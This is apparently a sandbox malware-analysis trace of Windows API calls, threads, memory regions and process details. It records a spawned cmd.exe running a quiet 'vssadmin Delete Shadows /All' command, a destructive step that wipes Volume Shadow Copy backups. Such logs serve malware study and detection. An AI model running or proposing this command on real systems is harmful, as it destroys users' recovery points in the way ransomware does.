	[0276.680] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x190) returned 0x6e92b8
	[0276.681] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6ddcd0
	[0276.681] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6c51b0) returned 1
	[0276.683] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6e8e70) returned 1
	[0276.686] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x4) returned 0x6c50f0
	[0276.686] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x190) returned 0x6e8c88
	[0276.686] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x10) returned 0x6cbf08
	[0276.687] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cbf08) returned 1
	[0276.688] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x190) returned 0x6e8e20
	[0276.688] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6ddd00
	[0276.689] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6c50f0) returned 1
	[0276.690] memcpy (in: _Dst=0x61e510, _Src=0x6e8fdd, _Size=0x2 | out: _Dst=0x61e510) returned 0x61e510
	[0276.690] memcpy (in: _Dst=0x61e510, _Src=0x6e8fdf, _Size=0x2 | out: _Dst=0x61e510) returned 0x61e510
	[0276.690] memcpy (in: _Dst=0x61e510, _Src=0x6e8fe1, _Size=0x2 | out: _Dst=0x61e510) returned 0x61e510
	[0276.691] memcpy (in: _Dst=0x61e510, _Src=0x6e8fe3, _Size=0x2 | out: _Dst=0x61e510) returned 0x61e510
	[0276.692] memcpy (in: _Dst=0x61e510, _Src=0x6e9f0a, _Size=0x4 | out: _Dst=0x61e510) returned 0x61e510
	[0276.693] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6e8c88) returned 1
	[0276.833] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6e8e20) returned 1
	[0276.834] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6e92b8) returned 1
	[0276.834] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6ddcd0) returned 1
	[0276.834] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6ddd00) returned 1
	[0276.835] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6ddb80) returned 1
	[0276.836] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6e8898) returned 1
	[0276.837] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x40) returned 0x6e4850
	[0276.837] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6dcc08
	[0276.837] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcc08) returned 1
	[0276.838] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6e4850) returned 1
	[0276.838] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x40) returned 0x6e4580
	[0276.839] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6dce28
	[0276.839] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dce28) returned 1
	[0276.839] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6e4580) returned 1
	[0276.840] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x48) returned 0x6dc858
	[0276.840] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6d9aa8
	[0276.840] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6d9aa8) returned 1
	[0276.840] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dc858) returned 1
	[0276.841] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x48) returned 0x6dc3a8
	[0276.841] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6d9a80
	[0276.842] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6d9a80) returned 1
	[0276.842] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dc3a8) returned 1
	[0277.083] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6d9aa8
	[0277.084] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c) returned 0x6e3050
	[0277.084] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6e3050) returned 1
	[0277.085] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c) returned 0x6e3440
	[0277.099] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6e3440) returned 1
	[0277.099] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6d9aa8) returned 1
	[0277.100] GetModuleHandleW (lpModuleName="ntdll") returned 0x77040000
	[0277.101] GetProcAddress (hModule=0x77040000, lpProcName="EtwEventRegister") returned 0x77088c00
	[0277.101] GetProcAddress (hModule=0x77040000, lpProcName="EtwEventUnregister") returned 0x7708f5c0
	[0277.101] GetProcAddress (hModule=0x77040000, lpProcName="EtwEventWrite") returned 0x7709ae80
	[0277.101] GetProcAddress (hModule=0x77040000, lpProcName="EtwEventActivityIdControl") returned 0x7709afe0
	[0277.101] GetProcAddress (hModule=0x77040000, lpProcName="EtwEventWriteTransfer") returned 0x770a61f0
	[0277.102] GetProcAddress (hModule=0x77040000, lpProcName="EtwEventEnabled") returned 0x7709db10
	[0277.102] EtwEventRegister (in: ProviderId=0x6f7d3fa8, EnableCallback=0x0, CallbackContext=0x0, RegHandle=0x6f82b448 | out: RegHandle=0x6f82b448) returned 0x0
	[0277.102] EtwEventWrite (RegHandle=0x6ba810, EventDescriptor=0x21, UserDataCount=0x6f7d3ec0, UserData=0x5) returned 0x0
	[0277.939] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28) returned 0x6dd8b0
	[0277.940] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UAGKXZ () returned 0x1
	[0278.307] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28) returned 0x6ddd60
	[0278.307] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x48) returned 0x6dc6c8
	[0278.308] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UAGKXZ () returned 0x2
	[0278.309] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x78) returned 0x6cd4a0
	[0278.310] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x10) returned 0x6e8d60
	[0278.426] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6e8d60) returned 1
	[0278.426] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20) returned 0x6ee330
	[0278.426] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcf48
	[0278.426] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcce8
	[0278.427] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcea8
	[0278.427] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcc28
	[0278.427] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcc68
	[0278.431] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dc6c8) returned 1
	[0278.431] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6ddd60) returned 1
	[0278.432] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6ee330) returned 1
	[0278.432] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcf48) returned 1
	[0278.433] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcce8) returned 1
	[0278.433] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcea8) returned 1
	[0278.433] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcc28) returned 1
	[0278.434] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcc68) returned 1
	[0278.434] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cd4a0) returned 1

Thread:
	id = 292
	os_tid = 0x13b4


Thread:
	id = 293
	os_tid = 0x13b8


Thread:
	id = 304
	os_tid = 0xd3c


Thread:
	id = 308
	os_tid = 0xcb4


Thread:
	id = 309
	os_tid = 0x10ec

	[0278.298] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6d9c88) returned 1
	[0278.299] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcec8) returned 1
	[0278.299] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcd88) returned 1
	[0278.299] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcf48) returned 1
	[0278.300] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcce8) returned 1
	[0278.300] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcea8) returned 1
	[0278.300] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cdea0) returned 1
	[0278.736] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x78) returned 0x6cdba0
	[0278.736] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x10) returned 0x6e8d18
	[0278.737] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6e8d18) returned 1
	[0278.737] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x30) returned 0x6e34e8
	[0278.737] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcea8
	[0278.738] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcec8
	[0278.738] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcf48
	[0278.738] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcc28
	[0278.738] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcc68
	[0278.745] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x70) returned 0x6c4818
	[0278.746] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c) returned 0x6e3718
	[0278.748] RtlRestoreLastWin32Error () returned 0x0
	[0278.748] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x521e9a0, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x521e934 | out: pulNumLanguages=0x521e9a0, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x521e934) returned 1
	[0278.962] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x8) returned 0x6c5140
	[0278.962] RtlRestoreLastWin32Error () returned 0x0
	[0278.962] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x521e9a0, pwszLanguagesBuffer=0x6c5140, pcchLanguagesBuffer=0x521e934 | out: pulNumLanguages=0x521e9a0, pwszLanguagesBuffer=0x6c5140, pcchLanguagesBuffer=0x521e934) returned 1
	[0278.962] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x8) returned 0x6c5110
	[0278.962] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6c5140) returned 1
	[0278.962] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20) returned 0x6ee358
	[0278.963] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x6ee358, pulNumLanguages=0x521e9a0 | out: pulNumLanguages=0x521e9a0) returned 1
	[0278.964] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6ee358) returned 1
	[0278.964] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x78) returned 0x6cde20
	[0278.964] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcce8
	[0278.965] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcd08
	[0278.965] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dd208
	[0278.966] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dd2a8
	[0278.966] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dd048
	[0278.967] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x30) returned 0x6f0f18
	[0279.692] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xc) returned 0x6e8d18
	[0279.694] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1ec) returned 0x6f2f28
	[0279.694] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6e8d18) returned 1
	[0280.776] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6f2f28) returned 1
	[0280.936] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xc) returned 0x6e8f28
	[0280.936] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1ec) returned 0x6f18c8
	[0280.936] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6e8f28) returned 1
	[0280.937] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x190) returned 0x6f1ac0
	[0281.865] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6f1ac0) returned 1
	[0281.866] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6f18c8) returned 1
	[0281.866] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6f0f18) returned 1
	[0281.867] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcce8) returned 1
	[0281.867] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcd08) returned 1
	[0281.868] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dd208) returned 1
	[0281.868] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dd2a8) returned 1
	[0281.868] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dd048) returned 1
	[0281.869] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cde20) returned 1
	[0281.873] GetCurrentThreadId () returned 0x10ec
	[0281.874] RtlCaptureStackBackTrace (in: FramesToSkip=0x2, FramesToCapture=0x8, BackTrace=0x6f828020, BackTraceHash=0x0 | out: BackTrace=0x6f828020*=0x1097b33, BackTraceHash=0x0) returned 0x8
	[0281.874] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x4) returned 0x6c50f0
	[0281.874] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x6c50f0, pulNumLanguages=0x521e9d4 | out: pulNumLanguages=0x521e9d4) returned 1
	[0281.874] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6c50f0) returned 1
	[0281.874] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6c5110) returned 1
	[0281.875] GetCurrentThreadId () returned 0x10ec
	[0281.875] RtlCaptureStackBackTrace (in: FramesToSkip=0x2, FramesToCapture=0x8, BackTrace=0x6f828048, BackTraceHash=0x0 | out: BackTrace=0x6f828048*=0x10978c0, BackTraceHash=0x0) returned 0x8
	[0281.875] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6e34e8) returned 1
	[0281.876] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcea8) returned 1
	[0281.876] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcec8) returned 1
	[0281.877] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcf48) returned 1
	[0281.877] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcc28) returned 1
	[0281.877] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcc68) returned 1
	[0281.878] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cdba0) returned 1
	[0281.880] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6e3718) returned 1
	[0281.880] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6c4818) returned 1

Process:
	id = "44"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x2e9d3000"
	os_pid = "0xc9c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=O: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 3361
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 3362
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 3363
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 3364
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 3365
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 3366
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 3367
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 3368
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 3369
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 3370
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 3371
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 3372
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 3373
	        start_va = 0x7f540000
	          end_va = 0x7f562fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f540000"
	        filename = ""

Region:
	              id = 3374
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 3375
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 3376
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 3377
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 3378
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 3381
	        start_va = 0x1c0000
	          end_va = 0x25ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 3382
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 3385
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 3386
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3391
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 3392
	        start_va = 0x4600000
	          end_va = 0x48effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 3393
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3401
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 3402
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 3403
	        start_va = 0x7f440000
	          end_va = 0x7f53ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f440000"
	        filename = ""

Region:
	              id = 3619
	        start_va = 0x4600000
	          end_va = 0x46bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 3620
	        start_va = 0x47f0000
	          end_va = 0x48effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000047f0000"
	        filename = ""

Region:
	              id = 3621
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 3633
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 3634
	        start_va = 0x250000
	          end_va = 0x25ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000250000"
	        filename = ""

Region:
	              id = 3635
	        start_va = 0x46c0000
	          end_va = 0x47bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000046c0000"
	        filename = ""

Region:
	              id = 3636
	        start_va = 0x48f0000
	          end_va = 0x4a7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048f0000"
	        filename = ""

Region:
	              id = 3701
	        start_va = 0x4350000
	          end_va = 0x4353fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 3720
	        start_va = 0x4a80000
	          end_va = 0x4db6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 3721
	        start_va = 0x4360000
	          end_va = 0x4363fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004360000"
	        filename = ""


Thread:
	id = 267
	os_tid = 0x1090

	[0268.829] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0268.830] GetProcessHeap () returned 0x47f0000
	[0268.830] RtlAllocateHeap (HeapHandle=0x47f0000, Flags=0x8, Size=0x400a) returned 0x47f84e0
	[0268.830] GetProcessHeap () returned 0x47f0000
	[0268.831] RtlFreeHeap (HeapHandle=0x47f0000, Flags=0x0, BaseAddress=0x47f84e0) returned 1
	[0268.833] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0268.833] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0268.833] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0268.833] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0268.833] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0268.833] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0268.833] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0268.833] GetProcessHeap () returned 0x47f0000
	[0268.833] RtlAllocateHeap (HeapHandle=0x47f0000, Flags=0x8, Size=0x58) returned 0x47f57d0
	[0268.833] GetProcessHeap () returned 0x47f0000
	[0268.833] RtlAllocateHeap (HeapHandle=0x47f0000, Flags=0x8, Size=0x1a) returned 0x47f5830
	[0268.835] GetProcessHeap () returned 0x47f0000
	[0268.835] RtlAllocateHeap (HeapHandle=0x47f0000, Flags=0x8, Size=0x52) returned 0x47f5858
	[0268.837] GetConsoleTitleW (in: lpConsoleTitle=0x18f580, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0269.043] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0269.044] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0269.044] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0269.044] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0269.044] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0269.044] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0269.044] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
